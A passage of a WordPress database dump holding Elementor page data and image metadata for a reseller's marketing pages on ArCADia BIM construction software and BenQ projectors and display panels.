Revit.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a0c410\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9b0da03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3a2fef1\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"793f1fd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b5c521f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0759f39\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>ArCADia Tools<\\/h2><h4>Drive &amp; Supporting Software<\\/h4>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dd6f521\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"8ce7166\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":33.33},\"elements\":[{\"id\":\"7597f91\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\">ArCADia-3D VIEWER<\\/h3>\\n\\n<hr \\/>\\n\\n&nbsp;\\n<img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/10\\/3dviewer-1.jpg\\\" alt=\\\"\\\" \\/>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f73a3d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":35},\"elements\":[{\"id\":\"8743085\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\">ArCADia-TEXT<\\/h3><hr \\/><p>\\u00a0<br \\/><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/10\\/text-2.jpg\\\" alt=\\\"\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"25ed98b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":31.334},\"elements\":[{\"id\":\"958b19c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\">Licence Manager<\\/h3>\\n\\n<hr \\/>\\n\\n&nbsp;\\n<center><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/10\\/menadzer-lic-1.jpg\\\" alt=\\\"\\\" \\/><\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a7fbdd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3b87784\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"dbae713\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6629b54\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef1cf3c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ee9c18c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>To discover more, please click the button below or contact us to discuss your needs.<\\/p><center>[maxbutton id=\\\"1\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8288,3615,'_elementor_edit_mode','builder'),(8289,3615,'_elementor_template_type','post'),(8290,3615,'_elementor_version','2.5.14'),(8291,3615,'_wp_page_template','template-fullwidth.php'),(8292,3615,'_elementor_data','[{\"id\":\"d40dbd8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"c5214dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":10},\"elements\":[{\"id\":\"7b5aa8f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>ArCADia BIM<\\/h2><div>\\u00a0The emergence of the ArCADia BIM system is a logical consequence of the ArCADiasoft philosophy to meet the needs of designers at all stages of project development. The system intelligently supports and coordinates all participants throughout the design process in line with BIM (Building Information Modeling) technology while creating a comprehensive building information database. It provides complete control and security at all stages of design while streamlining and accelerating implementation.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d2fc327\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a842480\",\"elType\":\"widget\",\"settings\":{\"video_type\":\"hosted\",\"youtube_url\":\"https:\\/\\/www.arcadiabimsystem.com\\/lib\\/m09yeq\\/ArCADia-BIM_640mp4-k0gd9l07.mp4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\",\"insert_url\":\"yes\",\"external_url\":{\"url\":\"https:\\/\\/www.arcadiabimsystem.com\\/lib\\/m09yeq\\/ArCADia-BIM_640mp4-k0gd9l07.mp4\",\"is_external\":\"\",\"nofollow\":\"\"},\"autoplay\":\"yes\",\"loop\":\"yes\",\"controls\":\"\",\"rel\":\"yes\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c45d3b5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"35deb33\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c3543c6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b5bcfe4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ff54b6a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e4e5835\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>CONSTRUCTION &amp; ENGINEERING SOFTWARE<\\/h2><p>Arcadia have over 20 years of experience in creating computer applications for the construction industry and more than 100 products for architects and engineers. Our programs range from structural design to interior and installation design to energy performance of buildings calculations to buildings\\u2019 surroundings design.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ef02f15\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cc825cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3e361e3\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b4e625b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"50e7c30\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"351d3da\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>ArCADia BIM SYSTEM<\\/h2><p style=\\\"text-align: left;\\\">ArCADia BIM is more than twenty industry-specific modules. These include installation solutions for water, sewage, electricity, heating, etc., and programs intended for engineers to construct and calculate. These programs use a common database of objects (buildings), enable full cooperation between the various industries and the exchange of information and projects within and outside the system. ArCADia applications have IFC format support, which allows the user to collaborate with other programs such as Allplan, Archicad, or Revit.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a0c410\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9b0da03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3a2fef1\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"793f1fd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b5c521f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0759f39\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>ArCADia Tools<\\/h2><h4>Drive &amp; Supporting Software<\\/h4>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dd6f521\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"8ce7166\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7597f91\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\">ArCADia-3D VIEWER<\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f73a3d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8743085\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\">ArCADia-TEXT<\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"25ed98b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(8280,3611,'_wp_attached_file','2019/10/3dviewer-1.jpg'),(8281,3611,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:350;s:6:\"height\";i:185;s:4:\"file\";s:22:\"2019/10/3dviewer-1.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"3dviewer-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"3dviewer-1-300x159.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:159;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:22:\"3dviewer-1-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:20:\"3dviewer-1-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(8282,3612,'_wp_attached_file','2019/10/menadzer-lic-1.jpg'),(8283,3612,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:283;s:6:\"height\";i:195;s:4:\"file\";s:26:\"2019/10/menadzer-lic-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"menadzer-lic-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"menadzer-lic-1-283x150.jpg\";s:5:\"width\";i:283;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:24:\"menadzer-lic-1-20x14.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:14;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(8284,3613,'_wp_attached_file','2019/10/text-2.jpg'),(8285,3613,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:350;s:6:\"height\";i:185;s:4:\"file\";s:18:\"2019/10/text-2.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"text-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"text-2-300x159.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:159;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:18:\"text-2-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:16:\"text-2-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(8314,3619,'_wp_page_template','template-fullwidth.php'),(8315,3619,'_elementor_edit_mode','builder'),(8294,3616,'_elementor_edit_mode','builder'),(8295,3616,'_elementor_template_type','post'),(8296,3616,'_elementor_version','2.5.14'),(8297,3616,'_wp_page_template','template-fullwidth.php'),(8298,3616,'_elementor_data','[{\"id\":\"d40dbd8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"c5214dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":10},\"elements\":[{\"id\":\"7b5aa8f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>ArCADia BIM<\\/h2><div>\\u00a0The emergence of the ArCADia BIM system is a logical consequence of the ArCADiasoft philosophy to meet the needs of designers at all stages of project development. The system intelligently supports and coordinates all participants throughout the design process in line with BIM (Building Information Modeling) technology while creating a comprehensive building information database. It provides complete control and security at all stages of design while streamlining and accelerating implementation.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d2fc327\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a842480\",\"elType\":\"widget\",\"settings\":{\"video_type\":\"hosted\",\"youtube_url\":\"https:\\/\\/www.arcadiabimsystem.com\\/lib\\/m09yeq\\/ArCADia-BIM_640mp4-k0gd9l07.mp4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\",\"insert_url\":\"yes\",\"external_url\":{\"url\":\"https:\\/\\/www.arcadiabimsystem.com\\/lib\\/m09yeq\\/ArCADia-BIM_640mp4-k0gd9l07.mp4\",\"is_external\":\"\",\"nofollow\":\"\"},\"autoplay\":\"yes\",\"loop\":\"yes\",\"controls\":\"\",\"rel\":\"yes\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c45d3b5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"35deb33\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c3543c6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b5bcfe4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ff54b6a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e4e5835\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>CONSTRUCTION &amp; ENGINEERING SOFTWARE<\\/h2><p>Arcadia have over 20 years of experience in creating computer applications for the construction industry and more than 100 products for architects and engineers. Our programs range from structural design to interior and installation design to energy performance of buildings calculations to buildings\\u2019 surroundings design.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ef02f15\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cc825cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3e361e3\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b4e625b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"50e7c30\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"351d3da\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>ArCADia BIM SYSTEM<\\/h2><p style=\\\"text-align: left;\\\">ArCADia BIM is more than twenty industry-specific modules. These include installation solutions for water, sewage, electricity, heating, etc., and programs intended for engineers to construct and calculate. These programs use a common database of objects (buildings), enable full cooperation between the various industries and the exchange of information and projects within and outside the system. ArCADia applications have IFC format support, which allows the user to collaborate with other programs such as Allplan, Archicad, or Revit.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a0c410\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9b0da03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3a2fef1\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"793f1fd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b5c521f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0759f39\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>ArCADia Tools<\\/h2><h4>Drive &amp; Supporting Software<\\/h4>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dd6f521\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"8ce7166\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":33.33},\"elements\":[{\"id\":\"7597f91\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\">ArCADia-3D VIEWER<\\/h3>\\n\\n<hr \\/>\\n\\n&nbsp;\\n<img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/10\\/3dviewer-1.jpg\\\" alt=\\\"\\\" \\/>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f73a3d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":35},\"elements\":[{\"id\":\"8743085\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\">ArCADia-TEXT<\\/h3><hr \\/><p>\\u00a0<br \\/><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/10\\/text-2.jpg\\\" alt=\\\"\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"25ed98b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":31.334},\"elements\":[{\"id\":\"958b19c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\">Licence Manager<\\/h3>\\n\\n<hr \\/>\\n\\n&nbsp;\\n<center><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/10\\/menadzer-lic-1.jpg\\\" alt=\\\"\\\" \\/><\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8640,3657,'_wp_trash_meta_status','publish'),(8641,3657,'_wp_trash_meta_time','1571989294'),(8301,3506,'swift-performance','a:0:{}'),(8302,3617,'_elementor_template_type','post'),(8303,3617,'_wp_page_template','template-fullwidth.php'),(8304,3617,'_elementor_data','[{\"id\":\"f779967\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4678335\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7ed7379\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h1>Projectors<\\/h1>\\n<h3><\\/h3>\\n<h2>Business Projector (Smart Design for Presentations)<\\/h2>\\n<h3>High Brightness for Well-Lit Rooms<\\/h3>\\nIdeal for lights-on presentations in bright meeting rooms, BenQ business projectors produce high brightness for effective teamwork, collaboration, and note-taking. The high-lumen output ensures brilliant picture quality with vibrant colors as well as crisp text.\\n<h2>Interactive Classroom Projectors<\\/h2>\\n<h3>Enhanced Learning with Smart Interactivity for Tomorrow\'s Classrooms<\\/h3>\\nFutureproof BenQ Interactive Classroom Projectors empower collaborative learning with pen or touch annotation and short \\/ ultra-short throw projection based on brilliant laser or lamp light sources.\\n<ul>\\n \\t<li>Industry-Leading Dustproof Design: BenQ Dust Guard<sup>TM<\\/sup><\\/li>\\n \\t<li>High Brightness from 3000-3500 ANSI Lumens<\\/li>\\n \\t<li>High resolution with (Ultra) Short Throw<\\/li>\\n \\t<li>Scalable for Wireless Use and Interactivity<\\/li>\\n<\\/ul>\\n<h3><\\/h3>\\n<h2>Interactive Flat Panel<\\/h2>\\n<h3>Meeting Room &amp; Boardroom<\\/h3>\\nDigital displays help businesses improve meetings by presenting pertinent information through presentations, documents, images and more. BenQ has a variety of digital display solutions such as High Brightness Business Projectors and Interactive Flat Panels, all of which have been created for ease of use, and to increase efficiency and boost participation for office environments.\\n<h3>4K UHD 84\'\' Corporate Interactive Flat Panel Display | RP840G<\\/h3>\\n<h5>Work Collaboratively and Conduct Business Efficiently<\\/h5>\\nThe RP840G is a modern enterprise\\u2019s one-stop display solution for picture-perfect 4K presentation, seamless communication and real-time collaboration.With the built-in EZWrite annotation app, employees can instantly open a wide range of documents and directly mark on the screen for efficient idea sharing.\\n\\nWhether for brainstorming sessions or year-end financial meetings, the RP840G works smoothly with BenQ\\u2019s wireless presentation solution and allows employees to stream content from laptops or smart devices within seconds.\\n\\nFeaturing an open-platform design, the RP840G also offers unrivaled compatibility that lets employees work and discuss with the devices or software they prefer. And to encourage workplace health, the panel is built with proprietary eye-care technology so employees can focus on their jobs without suffering from eye fatigue.\\n<h4><\\/h4>\\n<h5>How BenQ Display turns meeting rooms into places of efficiency<\\/h5>\\n<ul>\\n \\t<li>Present content wirelessly and instantly with\\u00a0InstaShow<sup>TM<\\/sup>, a hardware that requires no software and allows up to 16 participants to connect notebooks and take over instantly<\\/li>\\n \\t<li>Display stunningly bright, crystal clear images with reliable, flexible\\u00a0Business Projectors\\u00a0that capture staff attention, while simultaneously streamlining company meetings<\\/li>\\n \\t<li>With Big Zoom and Lens Shift capability, flexible installation and easy calibration is possible on\\u00a0Business Projectors,\\u00a0even in large boardrooms<\\/li>\\n \\t<li>With BenQ\\u2019s\\u00a0Smart Display\\u00a0plus InstaQShare app pre-installed in your PC, smartphone and tablet, all presentations can go wirelessly.<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"1\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8305,3617,'_elementor_version','2.5.14'),(8306,3617,'_elementor_edit_mode','builder'),(8638,3660,'_elementor_template_type','wp-page'),(8639,3660,'_elementor_version','2.7.4'),(8323,3620,'_elementor_version','2.5.14'),(8324,3620,'_wp_page_template','template-fullwidth.php'),(8325,3620,'_elementor_data','[{\"id\":\"d40dbd8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"c5214dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":10},\"elements\":[{\"id\":\"7b5aa8f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>ArCADia BIM<\\/h2><div>\\u00a0The emergence of the ArCADia BIM system is a logical consequence of the ArCADiasoft philosophy to meet the needs of designers at all stages of project development. The system intelligently supports and coordinates all participants throughout the design process in line with BIM (Building Information Modeling) technology while creating a comprehensive building information database. It provides complete control and security at all stages of design while streamlining and accelerating implementation.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d2fc327\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a842480\",\"elType\":\"widget\",\"settings\":{\"video_type\":\"hosted\",\"youtube_url\":\"https:\\/\\/www.arcadiabimsystem.com\\/lib\\/m09yeq\\/ArCADia-BIM_640mp4-k0gd9l07.mp4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\",\"insert_url\":\"yes\",\"external_url\":{\"url\":\"https:\\/\\/www.arcadiabimsystem.com\\/lib\\/m09yeq\\/ArCADia-BIM_640mp4-k0gd9l07.mp4\",\"is_external\":\"\",\"nofollow\":\"\"},\"autoplay\":\"yes\",\"loop\":\"yes\",\"controls\":\"\",\"rel\":\"yes\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c45d3b5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"35deb33\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c3543c6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b5bcfe4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ff54b6a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e4e5835\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>CONSTRUCTION &amp; ENGINEERING SOFTWARE<\\/h2><p>Arcadia have over 20 years of experience in creating computer applications for the construction industry and more than 100 products for architects and engineers. Our programs range from structural design to interior and installation design to energy performance of buildings calculations to buildings\\u2019 surroundings design.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ef02f15\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cc825cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3e361e3\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b4e625b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"50e7c30\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"351d3da\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>ArCADia BIM SYSTEM<\\/h2><p style=\\\"text-align: left;\\\">ArCADia BIM is more than twenty industry-specific modules. These include installation solutions for water, sewage, electricity, heating, etc., and programs intended for engineers to construct and calculate. These programs use a common database of objects (buildings), enable full cooperation between the various industries and the exchange of information and projects within and outside the system. ArCADia applications have IFC format support, which allows the user to collaborate with other programs such as Allplan, Archicad, or Revit.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a0c410\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9b0da03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3a2fef1\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"793f1fd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b5c521f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0759f39\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>ArCADia Tools<\\/h2><h4>Drive &amp; Supporting 